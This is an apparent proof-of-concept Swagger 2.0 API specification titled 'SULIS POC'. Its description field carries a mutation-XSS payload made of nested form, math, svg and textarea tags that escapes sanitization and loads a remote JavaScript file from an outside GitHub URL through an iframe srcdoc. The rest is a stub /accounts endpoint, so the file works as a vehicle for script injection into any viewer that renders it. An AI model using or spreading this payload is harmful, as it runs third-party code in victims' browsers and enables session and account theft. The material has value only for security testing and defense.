swagger: '2.0'
info:
  title: SULIS POC
  description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><desc id="</textarea><math><mtext><!--"><textarea id="--><iframe srcdoc="<script><script src=https://raw.githubusercontent.com/ibus1/xss/refs/heads/main/xss.js></script>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        0: 
      operationId: findAccounts
      summary: [Client account information]
